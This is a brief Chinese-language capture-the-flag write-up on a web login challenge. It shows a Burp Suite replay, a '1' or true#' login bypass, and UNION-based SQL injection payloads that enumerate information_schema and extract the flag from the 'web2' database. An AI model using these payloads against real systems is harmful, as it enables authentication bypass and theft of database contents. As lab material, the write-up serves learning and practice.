弱口令失败
使用bp抓包重放
用万能密码便能登录成功,或者1' or true#,一个正确后面便可以执行
出现回显漏洞
出现回显为‘2’
数据库名为web2
username=1'or 1=1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema="web2"),3#&password=
爆破表名
发现字段名也是flag
username=1'or 1=1 union select 1,(select group_concat(column_name)from information_schema.columns where table_schema="web2" and table_name="flag"),3#&password=
username=1'or 1=1 union select 1,(select flag from web2.flag),3#&password=
爆破出flag